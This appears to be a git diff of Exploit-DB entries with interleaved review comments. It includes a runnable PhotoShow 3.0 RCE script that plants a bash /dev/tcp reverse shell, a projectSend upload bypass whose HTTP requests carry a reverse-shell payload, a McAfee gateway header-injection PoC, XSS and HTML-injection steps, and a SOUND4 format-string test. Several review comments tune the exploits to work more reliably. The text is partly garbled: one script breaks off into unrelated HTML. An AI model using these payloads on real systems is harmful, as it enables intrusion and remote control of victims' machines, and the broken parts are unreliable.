+BUCKET_ID_MODULE_STR: MSVCR120 +FAILURE_FUNCTION_NAME: _invoke_watson +BUCKET_ID_FUNCTION_STR: _invoke_watson +BUCKET_ID_OFFSET: e +BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e +BUCKET_ID_MODCHECKSUM: f8aef +BUCKET_ID_MODVER_STR: 12.0.40660.0 +BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_ +FAILURE_PROBLEM_CLASS: FAIL_FAST +FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson +FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson +WATSON_STAGEONE_URL: 
http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1 +TARGET_TIME: 2023-01-29T15:09:52.000Z +OSBUILD: 19044 +OSSERVICEPACK: 2364 +SERVICEPACK_NUMBER: 0 +OS_REVISION: 0 +OSPLATFORM_TYPE: x86 +OSNAME: Windows 10 +OSEDITION: Windows 10 WinNt SingleUserTS Personal +USER_LCID: 0 +OSBUILD_TIMESTAMP: 2008-01-07 11:33:18 +BUILDDATESTAMP_STR: 160101.0800 +BUILDLAB_STR: WinBuild +BUILDOSVER_STR: 10.0.19041.2364 +ANALYSIS_SESSION_ELAPSED_TIME: 635d +ANALYSIS_SOURCE: UM +FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson +FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f} + +Followup: MachineOwner +--------- + +0:000> d MSVCP120 +70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ.............. +70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@....... +70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................ +70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th +70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno +70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS +70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$....... 
+0:000> lmvm MSVCR120 +Browse full module list +start end module name +64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb + Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll + Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll + Image name: MSVCR120.dll + Browse all global symbols functions data + Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E) + CheckSum: 000F8AEF + ImageSize: 000EE000 + File version: 12.0.40660.0 + Product version: 12.0.40660.0 + File flags: 0 (Mask 3F) + File OS: 4 Unknown Win32 + File type: 2.0 Dll + File date: 00000000.00000000 + Translations: 0409.04b0 + CompanyName: Microsoft Corporation + ProductName: Microsoft® Visual Studio® 2013 + InternalName: msvcr120.dll + OriginalFilename: msvcr120.dll + ProductVersion: 12.00.40660.0 + FileVersion: 12.00.40660.0 built by: VSULDR + FileDescription: Microsoft® C Runtime Library + LegalCopyright: © Microsoft Corporation. All rights reserved. +0:000> x /D /f MSVCR120!getenv + MSVCR120!getenv (char *) +0:000> x /D /f MSVCR120!getenv +64477785 MSVCR120!getenv (char *) +.. 
+0:000> u 64477785 +MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: +64477785 6a0c push 0Ch +64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) +6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) +64477791 8365e400 and dword ptr [ebp-1Ch],0 +64477795 33c0 xor eax,eax +64477797 8b7508 mov esi,dword ptr [ebp+8] +6447779a 85f6 test esi,esi +6447779c 0f95c0 setne al +0:000> r +eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h +0:000> u 645046b1 +MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]: +645046b1 cd29 int 29h +645046b3 56 push esi +645046b4 6a01 push 1 +645046b6 be170400c0 mov esi,0C0000417h +645046bb 56 push esi +645046bc 6a02 push 2 +645046be e85efeffff call MSVCR120!_call_reportfault (64504521) +645046c3 56 push esi +0:000> u 64477785 +MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]: +64477785 6a0c push 0Ch +64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0) +6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b) +64477791 8365e400 and dword ptr [ebp-1Ch],0 +64477795 33c0 xor eax,eax +64477797 8b7508 mov esi,dword ptr [ebp+8] +6447779a 85f6 test esi,esi +6447779c 0f95c0 setne al +0:000> g +WARNING: Continuing a non-continuable exception +(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) 
+eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 +eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +MSVCR120!_invoke_watson+0xe: +645046b1 cd29 int 29h + + +--- + + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe + +C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file +02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b. +.1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA \ No newline at end of file diff --git a/exploits/java/webapps/51244.py b/exploits/java/webapps/51244.py new file mode 100755 index 000000000..dfad59e8c --- /dev/null +++ b/exploits/java/webapps/51244.py 
@@ -0,0 +1,30 @@
+# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
+# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
+# Date: 2021/05
+# Exploit Author: fu2x2000
+# Version: Liferay Portal 6.2.5 or later
+# CVE : CVE-2021-33990
+
+ import requests
+import json
+
+print (" Search this on Google #Dork for liferay
+-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")
+
+url ="URL Goes Here
+/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
+req = requests.get(url)
+print req
+sta = req.status_code
+if sta == 200:
+print ('Life Vulnerability exists')
+cook = url
+print cook
+inject = "Command=FileUpload&Type=File&CurrentFolder=/"
+#cook_inject = cook+inject
+#print cook_inject
+else:
+print ('not found try a another method')
+
+
+print ("solution restrict access and user groups")
\ No newline at end of file
diff --git a/exploits/java/webapps/51255.txt b/exploits/java/webapps/51255.txt
new file mode 100644
index 000000000..6adfae32e
--- /dev/null
+++ b/exploits/java/webapps/51255.txt
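Review bot: The script is not runnable under either Python 2 or 3: `print req` and `print cook` are Python 2 print statements while the remaining prints are calls, the `print (" Search this on Google ...` and `url ="URL Goes Here` string literals are split across two physical lines, the bodies of `if sta == 200:` and `else:` are not indented, and `import requests` carries a leading space. `inject` is assigned but never used (its only consumers are the two commented-out lines), so all the script actually does is issue one GET and report the status code; the title and the closing `print` should describe that rather than imply a file-upload check. The target is a hard-coded `URL Goes Here` placeholder that has to be hand-edited; taking it from `sys.argv[1]` behind a usage message, as the other scripts in this commit do, would be the conventional shape. `import json` is unused.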
@@ -0,0 +1,24 @@ +# Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS) +# Date: 7 Feb 2023 +# Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla +#Github - https://github.com/patrickdeanramos/CVE-2022-28598 +# Vendor Homepage: https://erpnext.com/ +# Version: 12.29 +# CVE-2022-28598 + +Summary: Stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29 where the +"last_known_version" field found in the "My Setting" page in ERPNext +12.29.0 allows remote attackers to inject arbitrary web script or HTML via +a crafted site name by doing an authenticated POST HTTP request to +'/desk#Form/User/(Authenticated User)' and inject the script in the +'last_known_version' field where we are able to view the script by +clicking the 'pdf' view form. + +This vulnerability is specifically the "last_known_version" field found +under the 'My Settings' where we need to first save the my settings. + +1. Login as any user +2. Under the ‘last_known_version’ field we are going to inject our +malicious script. +3. To view our injected script we need to click the view pdf page, and as +seen below we have successfully injected our script. \ No newline at end of file diff --git a/exploits/linux/local/51252.py b/exploits/linux/local/51252.py new file mode 100755 index 000000000..0e616fb7a --- /dev/null +++ b/exploits/linux/local/51252.py 
@@ -0,0 +1,105 @@ +# Exploit Title: GNU screen v4.9.0 - Privilege Escalation +# Date: 03.02.2023 +# Exploit Author: Manuel Andreas +# Vendor Homepage: https://www.gnu.org/software/screen/ +# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz +# Version: 4.9.0 +# Tested on: Arch Linux +# CVE : CVE-2023-24626 + +import os +import socket +import struct +import argparse +import subprocess +import pty +import time + +SOCKDIR_TEMPLATE = "/run/screens/S-{}" +MAXPATHLEN = 4096 +MAXTERMLEN = 32 +MAXLOGINLEN = 256 +STRUCTSIZE = 12584 +MSG_QUERY = 9 + +def find_latest_socket(dir): + return f"{dir}/{sorted(os.listdir(dir))[-1]}" + + +def build_magic(ver=5): + return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver + + +def build_msg(type): + return struct.pack(" + + + + + + McAfee Web Gateway - Notification + + + +------------------------------------------------------------------------ + +Static content is loaded from URL paths prefixed with +"/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this +prefix are intercepted and directly handled by the SWG no matter on +which domain they are accessed. While the prefix can be configured in +the SWG, attackers can also obtain it using another currently +undisclosed vulnerability. + +By reverse engineering the file "libSsos.so" and analysing JavaScript +code, it was possible to derive the API of the "Ssos" plugin's +"SetLoginToken" action. 
Through the following call using the +command-line HTTP client curl, the behaviour of the plugin was further +analysed: + +------------------------------------------------------------------------ +$ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p' +HTTP/1.0 200 OK +P3P: p +Connection: Keep-Alive +Set-Cookie: MwgSso=v; Path=/; Max-Age=240; +Content-Type: application/javascript +Content-Length: 2 +X-Frame-Options: deny + +c; +------------------------------------------------------------------------ + +The response embeds the values of the three URL parameters "v", "c" and +"p". The value for "p" is embedded as value of the "P3P" header, the +value of "c" as the response body and the value of "v" as the value +of the cookie "MwgSso". + +It is also possible to include newline or carriage return characters in +the parameter value which are not encoded in the output. Consequently, +if the value of the parameter "p" contains a line break, arbitrary +headers can be injected. If two line breaks follow, an arbitrary body +can be injected. If a suitable "Content-Length" header is injected, the +remaining headers and body of the original response will be ignored by +the browser. This means that apart from the initial "P3P" header, an +arbitrary response can be generated. For example, a page containing +JavaScript code could be returned, resulting in a cross-site scripting +attack. + +Consequently, attackers can construct URL paths that can be appended to +any domain and cause an arbitrary response to be returned if the URL is +accessed through the SWG. This could be exploited by distributing such +URLs or even by offering a website which performs an automatic redirect +to any other website using such a URL. As a result, the SWG exposes its +users to self-induced cross-site scripting vulnerabilities in any +website. 
+ + +Proof of Concept +================ + +In the following request, the "p" parameter is used to inject suitable +"Content-Type" and "Content-Length" headers, as well as an arbitrary +HTML response body. + +------------------------------------------------------------------------ +$ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a

RedTeam Pentesting

' +HTTP/1.0 200 OK +P3P: p +Content-Type: text/html +Content-Length: 27 + +

RedTeam Pentesting

+------------------------------------------------------------------------ + +As mentioned above, the HTTP response body could also include JavaScript +code designed to interact with the domain specified in the URL resulting +in a cross-site scripting vulnerability. + + +Workaround +========== + +None. + + +Fix +=== + +According to the vendor, the vulnerability is mitigated in versions +10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not +verified by RedTeam Pentesting GmbH. The vendor's security bulletin can +be found at the following URL: + +https://kcm.trellix.com/corporate/index?page=content&id=SB10393 + + +Security Risk +============= + +The vulnerability could be used to perform cross-site scripting attacks +against users of the SWG in context of any domain. Attackers only need +to convince users to open a prepared URL or visit an attacker's website +that could perform an automatic redirect to an exploit URL. This exposes +any website visited through the SWG to the various risks and +consequences of a cross-site scripting vulnerability such as account +takeover. As a result, this vulnerability poses a high risk. + + +Timeline +======== + +2022-07-29 Vulnerability identified +2022-10-20 Customer approved disclosure to vendor +2022-10-20 Vulnerability was disclosed to the vendor +2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and + 12.0.1. +2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. 
+ +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://jobs.redteam-pentesting.de/ + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Alter Posthof 1 Fax : +49 241 510081-99 +52062 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/multiple/webapps/51254.txt b/exploits/multiple/webapps/51254.txt new file mode 100644 index 000000000..4bb4eb2f1 --- /dev/null +++ b/exploits/multiple/webapps/51254.txt @@ -0,0 +1,29 @@ +# Exploit Title: BTCPay Server v1.7.4 - HTML Injection +# Date: 01/26/2023 +# Exploit Author: Manojkumar J (TheWhiteEvil) +# Vendor Homepage: https://github.com/btcpayserver/btcpayserver +# Software Link: +https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5 +# Version: <=1.7.4 +# Tested on: Windows10 +# CVE : CVE-2023-0493 + +# Description: + +BTCPay Server v1.7.4 HTML injection vulnerability. + +# Steps to exploit: + +1. Create an account on the target website. + +Register endpoint: https://target-website.com/register# + +2. Move on to the API key and create API key with the html injection in the +label field. + +Example: + +clickhere + + +3. Click remove/delete API key, the html injection will render. \ No newline at end of file diff --git a/exploits/multiple/webapps/51264.txt b/exploits/multiple/webapps/51264.txt new file mode 100644 index 000000000..f43e7ffb3 --- /dev/null +++ b/exploits/multiple/webapps/51264.txt 
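Review bot: The example payload under `Example:` has been reduced to the bare text `clickhere`; the HTML element that made it an injection was stripped from the entry, so steps 2–3 cannot be reproduced from what is published, and the payload should be quoted in a code span so it survives rendering (presumably an anchor or similar tag wrapping `clickhere`). The write-up should also say who sees the rendered label: as described, the API-key label is created and then removed by the same account that created it, so unless another store user or an admin views that page the impact is self-inflicted HTML injection rather than something that affects other users. A one-line statement such as `The label is rendered for any user who can see the store's API keys` (if that is the case) would settle it.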
@@ -0,0 +1,9 @@
+# Exploit Title: Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)
+# Date: 2023-02-10
+# Exploit Author: Andreas Finstad
+# Version: < 14.4.1.29
+# Tested on: Windows Server 2022
+# CVE : CVE-2023-23286
+POC:
+
+https://f20.be/blog/provide-server-14-4
\ No newline at end of file
diff --git a/exploits/php/dos/51256.txt b/exploits/php/dos/51256.txt
new file mode 100644
index 000000000..b6d70e55f
--- /dev/null
+++ b/exploits/php/dos/51256.txt
@@ -0,0 +1,39 @@
+## Exploit Title: ImageMagick 7.1.0-49 - DoS
+## Author: nu11secur1ty
+## Date: 02.07.2023
+## Vendor: https://imagemagick.org/
+## Software: https://imagemagick.en.uptodown.com/windows/download/82953605
+## Reference: https://portswigger.net/daily-swig/denial-of-service
+## CVE-ID: CVE-2022-44267
+
+## Description:
+ImageMagick 7.1.0-49 is vulnerable to Denial of Service.
+When it parses a PNG image (e.g., for resize), the convert process
+could be left waiting for stdin input.
+The attacker can easily send a malicious png file to the victim and
+then when the victim has opened this png he will crash the program.
+
+STATUS: HIGH Vulnerability
+
+[+]Payload:
+[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267/PoC)
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267)
+
+## Proof and Exploit:
+[href](https://streamable.com/l7z79c)
+
+## Time spend:
+00:30:00
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/exploits/php/webapps/51236.py b/exploits/php/webapps/51236.py
new file mode 100755
index 000000000..19a98b095
--- /dev/null
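Review bot: The `POC:` section holds only an external link, `https://f20.be/blog/provide-server-14-4`; nothing in the entry names the vulnerable endpoint, parameter or request, so the record has no reproducible content once the blog moves. The title names three issue classes (XSS, CSRF, RCE) and `# Version: < 14.4.1.29` sits beside `v.14.4` in the title, so it is unclear which build was tested and which is fixed. At least the request that triggers the RCE should be inlined, and the version line should read something like `# Version: 14.4 (fixed in 14.4.1.29)`.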
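Review bot: The `## Description:` contradicts itself: `could be left waiting for stdin input` describes a hang, which matches the "DoS" in the title, while `he will crash the program` describes a different failure that nothing in the entry demonstrates; the crash sentence should be dropped. The `## Software:` line links a third-party Windows download mirror (`uptodown.com`) rather than the vendor release, and the payload and reproduction steps are again only links to an external repository and a video, so nothing here can be verified offline. Include the PNG that triggers the stdin read and the exact `convert` invocation that hangs, and point `## Software:` at the vendor's own download page or release.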
+++ b/exploits/php/webapps/51236.py 
@@ -0,0 +1,93 @@ +# Exploit Title: PhotoShow 3.0 - Remote Code Execution +# Date: January 11, 2023 +# Exploit Author: LSCP Responsible Disclosure Lab +# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/ +# Vendor Homepage: https://github.com/thibaud-rohmer +# Software Link: https://github.com/thibaud-rohmer/PhotoShow +# Version: 3.0 +# Tested on: Ubuntu 20.04 LTS + +# creds of a user with admin privileges required + +import sys +import requests +import base64 +import urllib.parse + + +if(len(sys.argv)!=6): + print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' + + '"password" "target_ip" "attacker_ip" "attacker_nc_port"') + quit() + +login=sys.argv[1] +password=sys.argv[2] +targetIp = sys.argv[3] +attackerIp = sys.argv[4] +attackerNcPort = sys.argv[5] + + +def main(): + session = requests.Session() + #login as admin user + logInSession(session, targetIp, login, password) + #change application behaviour for handling .mp4 video + uploadExpoit(session, targetIp, attackerIp, attackerNcPort) + #send the shell to attaker's nc by uploading .mp4 video + sendMP4Video(session, targetIp) + print("Check your netcat") + +def logInSession(session, targetIp, login, password): + session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"}) + data = "login="+login+"&password="+password + url = "http://"+targetIp+"/?t=Login" + response= session.post(url, data=data) + phpsessid=response.headers.get("Set-Cookie").split(";")[0] + session.headers.update({'Cookie' : phpsessid}) + + +def uploadExpoit(session, targetIp, attackerIp, attackerNcPort): + exiftranPathInjection=createInjection(attackerIp, attackerNcPort) + url = "http://"+targetIp+"/?t=Adm&a=Set" + data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \ + + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\ + + 
"ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\ + + exiftranPathInjection + session.post(url, data=data).content.decode('utf8') + + +def createInjection(attakerIp, attackerNcPort): + textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1" + b64Encoded = base64.b64encode(textToEncode.encode("ascii")) + strb64 = str(b64Encoded) + strb64 = strb64[2:len(strb64)-1] + injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"} + return urllib.parse.urlencode(injection) + +def sendMP4Video(session, targetIp): + session.headers.update({'Content-Type' : "multipart/form-data; "\ + +"boundary=---------------------------752343701418612422363028651"}) + url = "http://"+targetIp+"/?a=Upl" + data = """-----------------------------752343701418612422363028651\r +Content-Disposition: form-data; name="path"\r +\r +\r +-----------------------------752343701418612422363028651\r +Content-Disposition: form-data; name="inherit"\r +\r +1\r +-----------------------------752343701418612422363028651\r +Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r +Content-Type: video/mp4\r +\r +a\r +-----------------------------752343701418612422363028651--\r +""" + try: + session.post(url, data=data, timeout=0.001) + except requests.exceptions.ReadTimeout: + pass + + +if __name__ =="__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51238.txt b/exploits/php/webapps/51238.txt new file mode 100644 index 000000000..537e1aa77 --- /dev/null +++ b/exploits/php/webapps/51238.txt 
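Review bot: `sendMP4Video` passes `timeout=0.001`, which in requests is both the connect and the read timeout, and only catches `requests.exceptions.ReadTimeout`; a `ConnectTimeout` (the likelier outcome at 1 ms) propagates uncaught, and the upload that triggers the `exiftran_path` command may never be sent at all. Use a normal connect timeout with a short read timeout, `session.post(url, data=data, timeout=(10, 3))`, and catch `requests.exceptions.Timeout`. `logInSession` has no success check: on a failed login `response.headers.get("Set-Cookie")` is `None` and `.split` raises `AttributeError`, and the manual `Cookie` header is redundant with the `requests.Session` cookie jar that already persists it; `createInjection`'s `str(b64Encoded)[2:len(strb64)-1]` should simply be `b64Encoded.decode("ascii")`. A header comment should also warn operators that the exploit persistently rewrites the admin settings (`exiftran_path`) and drops `/tmp/1.sh` on the target, since neither is cleaned up.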
@@ -0,0 +1,132 @@ +Exploit Title: projectSend r1605 - Remote Code Exectution RCE +Application: projectSend +Version: r1605 +Bugs: rce via file extension manipulation +Technology: PHP +Vendor URL: https://www.projectsend.org/ +Software Link: https://www.projectsend.org/ +Date of found: 26-01-2023 +Author: Mirabbas Ağalarov +Tested on: Linux +POC video: https://youtu.be/Ln7KluDfnk4 + +2. Technical Details & POC +======================================== + +1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. + +bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 + +2.Then the attacker starts listening for ip and port + nc -lvp 4444 + +3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg + + + +POST /includes/upload.process.php HTTP/1.1 +Host: localhost +Content-Length: 525 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-platform: "Linux" +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI +Accept: */* +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/upload.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 +Connection: close + +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="name" + +openme.sh;jpg +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="chunk" + +0 +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="chunks" + +1 +------WebKitFormBoundary0enbZuQQAtahFVjI +Content-Disposition: form-data; name="file"; filename="blob" +Content-Type: 
application/octet-stream + +bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 + +------WebKitFormBoundary0enbZuQQAtahFVjI-- + + +4.In the second request, we do this to the filename section at the bottom. + +openme.sh + + +POST /files-edit.php?ids=34 HTTP/1.1 +Host: localhost +Content-Length: 1016 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/files-edit.php?ids=34&type=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 +Connection: close + +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="csrf_token" + +66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02 +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][id]" + +34 +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][original]" + +openme.sh;.jpg +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][file]" + +1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][name]" + +openme.sh +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="file[1][description]" + + +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; 
name="file[1][expiry_date]" + +25-02-2023 +------WebKitFormBoundaryc8btjvyb3An7HcmA +Content-Disposition: form-data; name="save" + + +------WebKitFormBoundaryc8btjvyb3An7HcmA-- + + +And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce + + +private youtube video poc : https://youtu.be/Ln7KluDfnk4 \ No newline at end of file diff --git a/exploits/php/webapps/51240.txt b/exploits/php/webapps/51240.txt new file mode 100644 index 000000000..b90f43dbb --- /dev/null +++ b/exploits/php/webapps/51240.txt 
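Review bot: The closing paragraph, "it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce", describes code running on the machine of whoever downloads and executes `openme.sh`, not on the projectSend server, so the title's "Remote Code Execution" overstates what is shown; what the two requests demonstrate is an authenticated upload-filter bypass (upload as `openme.sh;jpg`, then rename through `file[1][name]` = `openme.sh`) whose impact is delivering a malicious file to other users. Both requests carry a `PHPSESSID` cookie and a `csrf_token`, so the prerequisite of an account with upload rights should be stated up front. The hard-coded `192.168.100.18:4444` in the payload is the author's listener and should be marked as a placeholder.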
@@ -0,0 +1,76 @@ +## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS) +## Development: nu11secur1ty +## Date: 01.29.2023 +## Vendor: https://zippy.com.ua/ +## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4 +## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4 + +## Description: +The value of manual insertion `point 1` is copied into the HTML +document as plain text between tags. +The payload giflcc0yu0 was submitted in +the manual insertion point 1. +This input was echoed unmodified in the application's response. + + +## STATUS: HIGH Vulnerability + +[+] Exploit: +```GET +GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a +HTTP/2 +Host: store.zippy.com.ua +Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439 +Cache-Control: max-age=0 